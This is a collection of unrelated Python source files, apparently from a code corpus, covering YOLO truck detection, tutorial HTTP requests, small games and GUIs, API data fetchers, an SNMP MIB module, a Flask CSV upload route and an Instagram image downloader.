labeled_frame, colors, labels, confidence, threshold) try: obj = labels[classids[0]] except: obj = None # Descriptions of a typical freight truck if (((obj == 'truck') and (boxWidth >= (boxHeight * 1.5)) and (boxHeight >= 0.4 * height) and (boxWidth >= 0.7 * width))): # Extract Timestamp from Video (TODO: Explore with this: https://www.geeksforgeeks.org/text-detection-and-extraction-using-opencv-and-ocr/) try: modified_name = output_name + ('_{time}'.format(time=str(int(vid.get(cv.CAP_PROP_POS_MSEC))))) # print(modified_name) except: # print("[ERROR] Failed to get timestamp of video") modified_name = output_name + '_?' #report_image_attributes(modified_name, xPos, boxWidth, boxHeight, width, height) if (option == 0) or (option == 2): # Save raw image save_image(raw_frame, modified_name, save_path, True) num_images += 1 if (option == 1) or (option == 2): # Save labeled image save_image(labeled_frame, modified_name, save_path, False) num_images += 1 if (option == 3): # Save Collage try: collage_name = str(modified_name + "_collage.png") primary = raw_frame # Capture secondary frame (10 frames over) for i in range(10): _, secondary = vid.read() # Put two images vertically on a collage save_image(np.vstack([primary, secondary]), collage_name, save_path, True) num_images += 1 except Exception as err: print("[ERROR] {e}".format(e=err)) delay = delay_time delay -= 1 if save_video is True: writer.write(labeled_frame) end = time.time() timings = np.append(timings, (end - start)) show_progress_bar(timings.size, total, num_images, np.average(timings), output_name, process_id) # Return progress bar value if gui is True: gui_obj.bar['value'] = (timings.size / total) * 100 gui_obj.bar.update_idletasks() # End process print("\n[INFO] Cleaning up...") if writer is not None: writer.release() vid.release() os.rename(file_path, done_path) else: # Infer real-time on webcam count = 0 vid = cv.VideoCapture(0) while True: _, frame = vid.read() height, width = frame.shape[:2] if count == 0: frame, boxes, confidences, classids, index, _, _, _, _ = infer_image(net, layer_names, height, width, frame, colors, labels, confidence, threshold) count += 1 else: frame, boxes, confidences, classids, index, _, _, _, _ = infer_image(net, layer_names, height, width, frame, colors, labels, confidence, threshold, boxes, confidences, classids, index, infer=False) count = (count + 1) % 6 cv.imshow('webcam', frame) if cv.waitKey(1) & 0xFF == ord('q'): break vid.release() cv.destroyAllWindows() print("[SUCCESS] Image Processing Complete...") def report_image_attributes(modified_name, xPos, boxWidth, boxHeight, width, height): print("Name: {n}".format(n=modified_name)) print("X Position: {x}".format(x=xPos)) print("BoxWidth: {bw}".format(bw=boxWidth)) print("BoxHeight: {bh}".format(bh=boxHeight)) print("Image Width: {iw}".format(iw=width)) print("Image Height: {ih}\n\n".format(ih=height)) def save_image(img, output_name, save_path, raw): num = 1 while True: if raw is True: filename = '{s}{o}_{n}_raw.png'.format(s=save_path, o=output_name, n=num) else: filename = '{s}{o}_{n}_labeled.png'.format(s=save_path, o=output_name, n=num) if os.path.isfile(filename): num += 1 else: cv.imwrite(filename, img) break def draw_labels_and_boxes(img, boxes, confidences, classids, idxs, colors, labels): # If there are any detections x, y, w, h = 0, 0, 0, 0 if len(idxs) > 0: for i in idxs.flatten(): # Get the bounding box coordinates x, y = boxes[i][0], boxes[i][1] w, h = boxes[i][2], boxes[i][3] # Get the unique color for this class color = [int(c) for c in colors[classids[i]]] # Draw the bounding box rectangle and label on the image cv.rectangle(img, (x, y), (x + w, y + h), color, 2) text = "{}: {:4f}".format(labels[classids[i]], confidences[i]) cv.putText(img, text, (x, y - 5), cv.FONT_HERSHEY_SIMPLEX, 0.5, color, 2) return img, x, y, w, h def generate_boxes_confidences_classids(outs, height, width, tconf): boxes = [] confidences = [] classids = [] for out in outs: for detection in out: # Get the scores, class ID, and the confidence of the prediction scores = detection[5:] classid = np.argmax(scores) confidence = scores[classid] # Consider only the predictions that are above a certain confidence level if confidence > tconf: box = detection[0:4] * np.array([width, height, width, height]) centerX, centerY, bwidth, bheight = box.astype('int') # Using the center x, y coordinates to derive the top # and the left corner of the bounding box x = int(centerX - (bwidth / 2)) y = int(centerY - (bheight / 2)) # Append to list boxes.append([x, y, int(bwidth), int(bheight)]) confidences.append(float(confidence)) classids.append(classid) return boxes, confidences, classids def infer_image(net, layer_names, height, width, img, colors, labels, confidence, threshold, boxes=None, confidences=None, classids=None, idxs=None, infer=True): if infer: # Constructing a blob from the input image blob = cv.dnn.blobFromImage(img, 1 / 255.0, (416, 416), swapRB=True, crop=False) # Perform a forward pass of the YOLO object detector net.setInput(blob) # Getting the outputs from the output layers outs = net.forward(layer_names) # Generate the boxes, confidences, and classIDs boxes, confidences, classids = generate_boxes_confidences_classids(outs, height, width, confidence) # Apply Non-Maxima Suppression to suppress overlapping bounding boxes idxs = cv.dnn.NMSBoxes(boxes, confidences, confidence, threshold) if boxes is None or confidences is None or idxs is None or classids is None: raise Exception('[ERROR] Required variables are set to None before drawing boxes on images.') # Draw labels and boxes on the image img, x, y, w, h = draw_labels_and_boxes(img, boxes, confidences, classids, idxs, colors, labels) return img, boxes, confidences, classids, idxs, x, y, w, h def show_progress_bar(count, total, num_images, diff, name, pid, status=''): bar_length = 40 filled_length = int(round(bar_length * count / float(total))) percentage = round(100.0 * count / float(total), 1) bar = '=' * filled_length + '-' * (bar_length - filled_length) sec_left = diff * (total - count) sys.stdout.write("%s[%s] %s%s (%s) %s ...%s\r\n" % ('{p}:'.format(p=name), str(bar), str(percentage), '%', time.strftime('%Hh, %Mm, %Ss', time.gmtime(sec_left)), '[{i}]'.format(i=num_images), status)) #sys.stdout.flush() def count_frames_manual(video): total = 0 while True: grabbed, frame = video.read() if not grabbed: break total += 1 video.release() return total
19,169
4,799
#!/usr/bin/env python3 # -*- encoding: utf-8 -*- import requests def simple_post_test(): params = {'firstname': 'Ryan', 'lastname': 'Mitchell'} r = requests.post("http://pythonscraping.com/files/processing.php", data=params) print(r.text) def cookie_test(): params = {'username': 'Ryan', 'password': 'password'} r = requests.post("http://pythonscraping.com/pages/cookies/welcome.php", params) print("Cookie is set to:") print(r.cookies.get_dict()) print("------------------") print("Going to profile page...") r = requests.get("http://pythonscraping.com/pages/cookies/profile.php", cookies=r.cookies) print(r.text) def session_test(): session = requests.Session() params = {'username': 'username', 'password': 'password'} s = session.post("http://pythonscraping.com/pages/cookies/welcome.php", params) print("Cookie is set to:") print(s.cookies.get_dict()) print("-----------------") print("Going to profile page...") s = session.get("http://pythonscraping.com/pages/cookies/profile.php") print(s.text) def auth_test(): from requests.auth import AuthBase from requests.auth import HTTPBasicAuth auth = HTTPBasicAuth('ryan', 'password') r = requests.post(url="http://pythonscraping.com/pages/auth/login.php",auth=auth) print(r.text) if __name__ == '__main__': auth_test()
1,386
476
from turtle import width import pyxel from random import randint class App: def __init__(self): width, height = 720, 1280 pyxel.init(width, height) self.raio = 10 self.color = 1 self.position_x = int(width/2) self.position_y = int(height/2) pyxel.run(self.update, self.draw) def update(self): if pyxel.btnp(pyxel.KEY_Q): pyxel.quit() self.raio = (self.raio + 10) % pyxel.width if self.raio <= 10: self.position_x = randint(200,500) self.position_y = randint(200,1000) self.color = (self.color + 1) % 15 def draw(self): pyxel.cls(0) pyxel.circb(self.position_x, self.position_y, self.raio, self.color) App()
775
305
from torch.utils.data import DataLoader, Dataset __build__ = 2018 __author__ = "singsam_jam@126.com" def get_loader(args, kwargs): train_loader = DataLoader(dataset=ModelDataset, batch_size=args.test_batch_size, collate_fn=collate_fn, shuffle=True, **kwargs) test_loader = DataLoader(dataset=ModelDataset, batch_size=args.test_batch_size, collate_fn=collate_fn, shuffle=False, **kwargs) return train_loader, test_loader class ModelDataset(Dataset): def __init__(self): pass def __getitem__(self, index): item = None return item def __len__(self): raise NotImplementedError def collate_fn(): pass
723
235
from uk_covid19 import Cov19API import geocoder import logging import requests import json logging.basicConfig(filename = "sys.log", encoding = 'utf-8') #get_location function def get_location(): """This function gets the location of the user""" current_location_data = geocoder.ip('me') return current_location_data.city #get news function def get_news() -> None: """Getting data from news api""" #Data request from the api base_url = "https://newsapi.org/v2/top-headlines?" with open('config.json', 'r') as config_file: temp = json.load(config_file) api_key = temp["keys"]["news_key"] country = "gb" complete_url = base_url + "country=" + country + "&apiKey=" + api_key response = requests.get(complete_url, timeout = 10) if response.status_code <= 400: logging.info('News request failed') #store news in file with open('news.json', 'w') as news_file: json.dump(response.json(), news_file) #get weather function def get_weather() -> None: """Getting data from weather API""" base_url = "http://api.openweathermap.org/data/2.5/weather?" with open('config.json', 'r') as config_file: temp = json.load(config_file) api_key = temp["keys"]["weather_key"] city_name = get_location() complete_url = base_url + "appid=" + api_key + "&q=" + city_name response = requests.get(complete_url, timeout = 10) if response.status_code >= 400: logging.info('Weather request failed') #store weather data in file with open('weather.json', 'w') as weather_file: json.dump(response.json(), weather_file) #get uk covid numbers def get_covid() -> None: """Getting data from uk covid api""" city_name = get_location() local_only = [ 'areaName={}'.format(city_name) ] data = { "date": "date", "areaName": "areaName", "newCasesByPublishDate": "newCasesByPublishDate" } api = Cov19API(filters = local_only, structure = data) covid_data = api.get_json() #store covid data in file with open('public_health_england.json', 'w') as covid_file: json.dump(covid_data, covid_file)
2,386
818
# -*- coding: utf-8 -*- """ Unit Test: orchard.system_status.formatters """
81
35
import time from time import time import dask import pandas as pd from dask.diagnostics import ProgressBar import datatracer def transform_single_column(tables, column_info): aggregation = column_info['aggregation'] column_name = column_info['source_col']['col_name'] fk = column_info['row_map'] if aggregation: transformer = eval(aggregation) return transformer(tables, fk, column_name) else: return tables[column_info['source_col']['table_name']][column_name].fillna(0.0).values def produce_target_column(tables, map_info): transformation = map_info['transformation'] if transformation: transformed_columns = [] for col_info in map_info['lineage_columns']: transformed_columns.append(transform_single_column(tables, col_info)) transformer = eval(transformation) return transformer(transformed_columns) else: return None def approx_equal(num, target, add_margin, multi_margin): if target >= 0: return (num <= target * (1 + multi_margin) + add_margin) and (num >= target * (1 - multi_margin) - add_margin) else: return (num <= target * (1 - multi_margin) + add_margin) and (num >= target * (1 + multi_margin) - add_margin) def approx_equal_arrays(num, target, add_margin, multi_margin): for n, t in zip(num, target): if not approx_equal(n, t, add_margin, multi_margin): return False return True @dask.delayed def evaluate_single_lineage(constraint, tracer, tables): field = constraint["fields_under_consideration"][0] related_fields = constraint["related_fields"] y_true = set() for related_field in related_fields: y_true.add((related_field["table"], related_field["field"])) try: start = time() ret_dict = tracer.solve(tables, target_table=field["table"], target_field=field["field"]) y_pred = {(col['source_col']['table_name'], col['source_col']['col_name']) for col in ret_dict['lineage_columns']} end = time() except BaseException: return { "table": field["table"], "field": field["field"], "precision": 0, "inference_time": 0, "status": "ERROR", } if len(y_pred) == len(y_true) and \ len(y_true.intersection(y_pred)) == len(y_pred): predicted_target = produce_target_column(tables, ret_dict) target_column = tables[field["table"]][field["field"]].fillna(0.0).values if approx_equal_arrays(predicted_target, target_column, 1e-8, 1e-8): precision = 1 else: precision = 0 else: precision = 0 return { "table": field["table"], "field": field["field"], "precision": precision, "inference_time": end - start, "status": "OK", } @dask.delayed def how_lineage(solver, target, datasets): """Benchmark the how lineage solver on the target dataset. Args: solver: The name of the how lineage pipeline. target: The name of the target dataset. datases: A dictionary mapping dataset names to (metadata, tables) tuples. Returns: A list of dictionaries mapping metric names to values for each deived column. """ datasets = datasets.copy() metadata, tables = datasets.pop(target) if not metadata.data.get("constraints"): return {} # Skip dataset, no constraints found. tracer = datatracer.DataTracer(solver) tracer.fit(datasets) list_of_metrics = [] for constraint in metadata.data["constraints"]: list_of_metrics.append(evaluate_single_lineage(constraint, tracer, tables)) list_of_metrics = dask.compute(list_of_metrics)[0] return list_of_metrics def benchmark_how_lineage(data_dir, dataset_name=None, solver="datatracer.how_lineage.basic"): """Benchmark the how lineage solver. This uses leave-one-out validation and evaluates the performance of the solver on the specified datasets. Args: data_dir: The directory containing the datasets. dataset_name: The target dataset to test on. If none is provided, will test on all available datasets by default. solver: The name of the column map pipeline. Returns: A DataFrame containing the benchmark resuls. """ datasets = datatracer.load_datasets(data_dir) dataset_names = list(datasets.keys()) if dataset_name is not None: if dataset_name in dataset_names: dataset_names = [dataset_name] else: return None datasets = dask.delayed(datasets) dataset_to_metrics = {} for dataset_name in dataset_names: dataset_to_metrics[dataset_name] = how_lineage( solver=solver, target=dataset_name, datasets=datasets) rows = [] with ProgressBar(): results = dask.compute(dataset_to_metrics)[0] for dataset_name, list_of_metrics in results.items(): for metrics in list_of_metrics: metrics["dataset"] = dataset_name rows.append(metrics) df = pd.DataFrame(rows) dataset_col = df.pop('dataset') table_col = df.pop('table') field_col = df.pop('field') df.insert(0, 'field', field_col) df.insert(0, 'table', table_col) df.insert(0, 'dataset', dataset_col) return df
5,522
1,638
# # PySNMP MIB module H323-TRAP-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/H323-TRAP-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 19:07:51 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # gwID, timeOccurred, reason, registrationStatus, comment, gwType, csID, port, percent, csType, gwIP, moduleID, code = mibBuilder.importSymbols("AGGREGATED-EXT-MIB", "gwID", "timeOccurred", "reason", "registrationStatus", "comment", "gwType", "csID", "port", "percent", "csType", "gwIP", "moduleID", "code") OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint") NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance") TimeTicks, enterprises, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectName, Counter64, Unsigned32, snmpModules, ObjectIdentity, MibIdentifier, Gauge32, IpAddress, Counter32, NotificationType, ModuleIdentity, Bits, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "enterprises", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectName", "Counter64", "Unsigned32", "snmpModules", "ObjectIdentity", "MibIdentifier", "Gauge32", "IpAddress", "Counter32", "NotificationType", "ModuleIdentity", "Bits", "Integer32") TestAndIncr, DisplayString, RowStatus, TruthValue, TimeStamp, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "TestAndIncr", "DisplayString", "RowStatus", "TruthValue", "TimeStamp", "TextualConvention") lucent = MibIdentifier((1, 3, 6, 1, 4, 1, 1751)) products = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1)) softSwitch = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1, 1198)) h323DeviceServer = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3)) h323Traps = ModuleIdentity((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0)) if mibBuilder.loadTexts: h323Traps.setLastUpdated('240701') if mibBuilder.loadTexts: h323Traps.setOrganization('Lucent Technologies') h323CSConnectionStatus = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 0)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "csID"), ("AGGREGATED-EXT-MIB", "csType"), ("AGGREGATED-EXT-MIB", "registrationStatus"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment")) if mibBuilder.loadTexts: h323CSConnectionStatus.setStatus('current') h323GatewayUtilization = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 1)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "gwID"), ("AGGREGATED-EXT-MIB", "moduleID"), ("AGGREGATED-EXT-MIB", "percent"), ("AGGREGATED-EXT-MIB", "comment")) if mibBuilder.loadTexts: h323GatewayUtilization.setStatus('current') h323DSError = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 2)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment")) if mibBuilder.loadTexts: h323DSError.setStatus('current') h323UnreachableGateway = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 3)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "gwID"), ("AGGREGATED-EXT-MIB", "gwType"), ("AGGREGATED-EXT-MIB", "gwIP"), ("AGGREGATED-EXT-MIB", "port"), ("AGGREGATED-EXT-MIB", "comment")) if mibBuilder.loadTexts: h323UnreachableGateway.setStatus('current') h323CommandFailed = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 4)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment")) if mibBuilder.loadTexts: h323CommandFailed.setStatus('current') mibBuilder.exportSymbols("H323-TRAP-MIB", h323CSConnectionStatus=h323CSConnectionStatus, h323UnreachableGateway=h323UnreachableGateway, h323CommandFailed=h323CommandFailed, softSwitch=softSwitch, products=products, h323Traps=h323Traps, PYSNMP_MODULE_ID=h323Traps, h323GatewayUtilization=h323GatewayUtilization, h323DSError=h323DSError, h323DeviceServer=h323DeviceServer, lucent=lucent)
4,606
2,000
# save this as app.py from __main__ import app, ALLOWED_EXTENSIONS, UPLOAD_FOLDER from flask import Flask, request, jsonify, abort, render_template, Flask, flash, redirect, url_for from werkzeug.utils import secure_filename import os import io import csv from models import * def allowed_file(filename): return '.' in filename and \ filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS def transform(text_file_contents): return text_file_contents.replace("=", ",") @app.route("/admin", methods=["GET", "POST"]) def admin(): if request.method == "POST": table = request.form.get("table") if 'csv' not in request.files: flash('No file part') return redirect(request.url) file = request.files['csv'] # If the user does not select a file, the browser submits an # empty file without a filename. if file.filename == '': flash('No selected file') return redirect(request.url) if file and allowed_file(file.filename): # import pdb; pdb.set_trace() flash('File uploaded Successfully!') filename = secure_filename(file.filename) file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) # Read csv file csv_input = csv.DictReader(open(os.path.join(app.config['UPLOAD_FOLDER'], filename))) rel_version = release_version(6) db.session.add(rel_version) db.session.commit() rel_id = rel_version.id for row in csv_input: print(row) performance = performance_results(rel_id, row['Label'], int(row['# Samples']), int(row['Average']), int(row['Median']), int(row['90% Line']), int(row['95% Line']), int(row['99% Line']), int(row['Min']), int(row['Max']), float(row['Error %']), float(row['Throughput']), float(row['Received KB/sec']), float(row['Sent KB/sec'])) db.session.add(performance) db.session.commit() return redirect(request.url) return render_template("admin/admin.html"), 404
2,132
636
# This module sets up an initial data function meant to # be called in a pointwise manner at all gridpoints. # Author: Zachariah B. Etienne # zachetie **at** gmail **dot* com from outputC import * def BSSN_ID_function_string(cf,hDD,lambdaU,aDD,trK,alpha,vetU,betU): returnstring = "void BSSN_ID(REAL xx0,REAL xx1,REAL xx2,REAL Cartxyz0,REAL Cartxyz1,REAL Cartxyz2,\n" returnstring += "\tREAL *hDD00,REAL *hDD01,REAL *hDD02,REAL *hDD11,REAL *hDD12,REAL *hDD22,\n" returnstring += "\tREAL *aDD00,REAL *aDD01,REAL *aDD02,REAL *aDD11,REAL *aDD12,REAL *aDD22,\n" returnstring += "\tREAL *trK,\n" returnstring += "\tREAL *lambdaU0,REAL *lambdaU1,REAL *lambdaU2,\n" returnstring += "\tREAL *vetU0,REAL *vetU1,REAL *vetU2,\n" returnstring += "\tREAL *betU0,REAL *betU1,REAL *betU2,\n" returnstring += "\tREAL *alpha,REAL *cf) {\n" returnstring += outputC([hDD[0][0], hDD[0][1], hDD[0][2], hDD[1][1], hDD[1][2], hDD[2][2], aDD[0][0], aDD[0][1], aDD[0][2], aDD[1][1], aDD[1][2], aDD[2][2], trK, lambdaU[0], lambdaU[1], lambdaU[2], vetU[0], vetU[1], vetU[2], betU[0], betU[1], betU[2], alpha, cf], ["*hDD00", "*hDD01", "*hDD02", "*hDD11", "*hDD12", "*hDD22", "*aDD00", "*aDD01", "*aDD02", "*aDD11", "*aDD12", "*aDD22", "*trK", "*lambdaU0", "*lambdaU1", "*lambdaU2", "*vetU0", "*vetU1", "*vetU2", "*betU0", "*betU1", "*betU2", "*alpha", "*cf"], filename="returnstring", params="preindent=1,CSE_enable=True,outCverbose=False", # outCverbose=False to prevent # enormous output files. prestring="", poststring="") returnstring += "}\n" return returnstring
2,057
769
#!/usr/bin/python # coding:utf-8 """ Instagram Downloader """ import os import logging import time import requests from datetime import datetime import tkinter as tk from tkinter import ttk from tkinter import messagebox from selenium import webdriver from webdriver_manager.chrome import ChromeDriverManager from bs4 import BeautifulSoup as bs class MyApp(object): """ define the GUI interface """ def __init__(self): self.set_log() self.root = tk.Tk() self.root.title("Instgram Downloader") self.root.geometry('500x250') self.canvas = tk.Canvas(self.root, height=400, width=700) self.canvas.pack(side='top') self.setup_ui() def set_log(self): if not os.path.exists('./screenshot'): os.mkdir('./screenshot') if not os.path.exists('./log'): os.mkdir('./log') log_name = 'log/RPA_%Y%m%d_%H%M%S.log' logging.basicConfig(level=logging.INFO, filename=datetime.now().strftime(log_name), filemode='w', format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s') self.logger = logging.getLogger(log_name) def setup_ui(self): """ setup UI interface """ self.label_save_file = tk.Label(self.root, text='存檔資料夾:') self.label_pattern = tk.Label(self.root, text = "選擇模式:") self.label_id = tk.Label(self.root, text = "id or tag:") self.label_limit = tk.Label(self.root, text='圖片上限:') self.input_save_file = tk.Entry(self.root, width=30) self.input_pattern = ttk.Combobox(self.root, values=["id", "tag"]) self.input_pattern.current(0) self.input_limit = tk.Entry(self.root, width=30) self.input_id = tk.Entry(self.root, width=30) self.input_tag = tk.Entry(self.root, width=30) self.login_button = tk.Button(self.root, command=self.run, text="Run", width=10, foreground = "black") self.quit_button = tk.Button(self.root, command=self.quit, text="Quit", width=10, foreground = "black") def gui_arrang(self): """ setup position of UI """ self.label_save_file.place(x=60, y=30) self.label_pattern.place(x=60, y=70) self.label_id.place(x=60, y=110) self.label_limit.place(x=60, y=150) self.input_save_file.place(x=130, y=30) self.input_pattern.place(x=130, y=70) self.input_id.place(x=130, y=110) self.input_limit.place(x=130, y=150) self.login_button.place(x=130, y=190) self.quit_button.place(x=270, y=190) def check(self): """ check the input of gui interface return: True False """ # check your input self.save_file = self.input_save_file.get() self.pattern = self.input_pattern.get() self.id = self.input_id.get() if len(self.save_file) == 0 or len(self.pattern) == 0 or \ len(self.id)==0 or len(self.input_limit.get())==0: messagebox.showinfo(title='System Alert', message='不得為空!') self.logger.info('填選處為空值!') return False try: self.limit = int(self.input_limit.get()) except: messagebox.showinfo(title='System Alert', message='限制數應為整數!') self.logger.info('限制數應為整數!') return False # check your save file if not self.pattern in ['id','tag']: messagebox.showinfo(title='System Alert', message=f'模式輸入有誤') self.logger.warning('The pattern is wrong!') return False # check your save file if self.save_file in ['log','screenshot']: messagebox.showinfo(title='System Alert', message=f'該資料夾檔名不可使用!') self.logger.warning('The file name is wrong!') return False if not os.path.exists(f'./{self.save_file}'): os.mkdir(f'./{self.save_file}') messagebox.showinfo(title='System Alert', message=f'已建立{self.save_file}的資料夾') self.logger.info(f'Make dir:{self.save_file}') return True def download(self): """ download instagram photo """ # get driver driver = webdriver.Chrome(ChromeDriverManager().install()) driver.maximize_window() # create url if self.pattern=='id': user_id = self.id elif self.pattern=='tag': user_id = f'explore/tags/{self.id}/' origin_url = 'https://www.instagram.com/' + user_id driver.get(origin_url) time.sleep(3) SCROLL_PAUSE_TIME = 3 images_unique=[] # Get scroll height last_height = driver.execute_script("return document.body.scrollHeight") while True: # Wait to load page time.sleep(SCROLL_PAUSE_TIME) # Scroll down to bottom driver.execute_script("window.scrollTo(0, document.body.scrollHeight);") # Wait time.sleep(1) # show more if exists try: button_name = f'顯示更多 {user_id} 的貼文' show_more = driver.find_element_by_xpath(f"//*[contains(text(),'{button_name}')]") show_more.click() except: pass # Wait to load page time.sleep(SCROLL_PAUSE_TIME) # Calculate new scroll height and compare with last scroll height new_height = driver.execute_script("return document.body.scrollHeight") if new_height == last_height: driver.execute_script("window.scrollTo(document.body.scrollHeight,0);") break # This means that there is still photos to scrap last_height = new_height time.sleep(1) # Retrive the html html_to_parse = str(driver.page_source) html = bs(html_to_parse,"html5lib") # Get the image's url images_url = html.findAll("img", {"class": "FFVAD"}) # Check if they are unique in_first = set(images_unique) in_second = set(images_url) in_second_but_not_in_first = in_second - in_first result = images_unique + list(in_second_but_not_in_first) images_unique = result # if the images greater than the limit, break if len(images_unique)>self.limit: break num_images = len(images_unique) self.logger.info(f'抓到{num_images}張圖片') #Close the webdriver driver.close() for i, _ in enumerate(images_unique): try: # Save each image.jpg file name=f"./{self.save_file}/{self.id}"+str(i)+".jpg" with open(name, 'wb') as handler: img_data = requests.get(images_unique[i].get("src")).content handler.write(img_data) except: self.logger.warning('無法存取:{}'.format(images_unique[i])) def run(self): """ when you click the button of run, it'll execute """ start_time = datetime.now() if self.check(): self.download() messagebox.showinfo(title='System Alert', message='程式執行完畢!') else: self.logger.warning('檢查不通過!') end_time = datetime.now() execution_time = (end_time-start_time).seconds self.logger.info('Total Execution time:', execution_time, 's') messagebox.showinfo(title='System Alert', message=f'執行時間:{execution_time}秒') def quit(self): """ when you click the button of quit, it'll execute """ self.root.destroy() def main(): """ main function for MyApp """ # initial app = MyApp() # arrage gui app.gui_arrang() # run tkinter tk.mainloop() if __name__ == '__main__': main()
8,163
2,642
"""CLI interface.""" import fire from train import TrainingPipeline from data.load import FileDataLoader from modelling.estimator import HeuristicEstimator class Entrypoint: """CLI entrypoint.""" def __init__(self) -> None: self.train = TrainingPipeline() self.data = FileDataLoader() self.model = HeuristicEstimator() def cli() -> None: """Function to start cli.""" fire.Fire(Entrypoint) if __name__ == "__main__": cli()
474
146
import pygame from os import path import constants as con class ability: def __init__(self): self.__power = 1 self.__power_timer = pygame.time.get_ticks() def powerdown(self): if pygame.time.get_ticks() - self.__power_timer > con.poweruptime: self.__power -= 1 self.__power_timer = pygame.time.get_ticks() def powerup(self): self.__power += 1 self.__power_timer = pygame.time.get_ticks() def get_Power(self): return self.__power
538
164
# Copyright (C) 2022 viraelin # License: MIT from PyQt6.QtCore import * from PyQt6.QtWidgets import * from PyQt6.QtGui import * import system from layer_type_menu import LayerType class PreviewTile(QGraphicsRectItem): # def __init__(self, item: QStandardItem) -> None: def __init__(self) -> None: super().__init__() # todo: use actual tile data/color # index = item.index() # color_str = index.siblingAtColumn(3).data(Qt.ItemDataRole.DisplayRole) color_str = "#080808" self.color = QColor(color_str) # alpha = 0.9 # self.color.setAlphaF(alpha) x = 0 y = 0 size = system.cell_size rect = QRectF(x, y, size, size) self.setRect(rect) self.setZValue(400) def snap(self, pos: QPointF) -> None: pos = system.get_snap_pos(pos) self.setX(pos.x()) self.setY(pos.y()) def boundingRect(self) -> QRectF: pad = 4 return self.rect().adjusted(-pad, -pad, pad, pad) def paint(self, painter: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget) -> None: pen = QPen() pen.setStyle(Qt.PenStyle.SolidLine) pen.setCapStyle(Qt.PenCapStyle.SquareCap) pen.setJoinStyle(Qt.PenJoinStyle.MiterJoin) pen.setColor(self.color) brush = QBrush() brush.setStyle(Qt.BrushStyle.NoBrush) width = 2 hwidth = 1 rect = self.rect().adjusted(-hwidth, -hwidth, hwidth, hwidth) pen.setWidth(width) painter.setPen(pen) painter.setBrush(brush) painter.drawRect(rect) class PreviewEntity(QGraphicsRectItem): def __init__(self, item: QStandardItem) -> None: super().__init__() index = item.index() width = index.siblingAtColumn(1).data(Qt.ItemDataRole.DisplayRole) height = index.siblingAtColumn(2).data(Qt.ItemDataRole.DisplayRole) color_str = index.siblingAtColumn(3).data(Qt.ItemDataRole.DisplayRole) self.color = QColor(color_str) alpha = 0.1 self.color.setAlphaF(alpha) origin_name = index.siblingAtColumn(4).data(Qt.ItemDataRole.DisplayRole) offset = system.OriginPoint[origin_name].value self.offset = offset x = 0 y = 0 rect = QRectF(x, y, width, height) self.setRect(rect) self.setZValue(400) def snap(self, pos: QPointF) -> None: # todo: this is copied from snapping GraphicsItem offset = self.offset width = self.rect().width() height = self.rect().height() ox = int(offset.x() * width) oy = int(offset.y() * height) offset = QPointF(ox, oy) pos -= offset pos = system.get_snap_pos(pos) self.setX(pos.x()) self.setY(pos.y()) def paint(self, painter: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget) -> None: pen = QPen() pen.setStyle(Qt.PenStyle.SolidLine) pen.setCapStyle(Qt.PenCapStyle.SquareCap) pen.setJoinStyle(Qt.PenJoinStyle.MiterJoin) pen.setColor(self.color) brush = QBrush() brush.setColor(self.color) brush.setStyle(Qt.BrushStyle.SolidPattern) width = 4 hwidth = width / 2 rect = self.rect().adjusted(hwidth, hwidth, -hwidth, -hwidth) pen.setWidth(width) painter.setPen(pen) painter.setBrush(brush) painter.drawRect(rect)
3,475
1,203
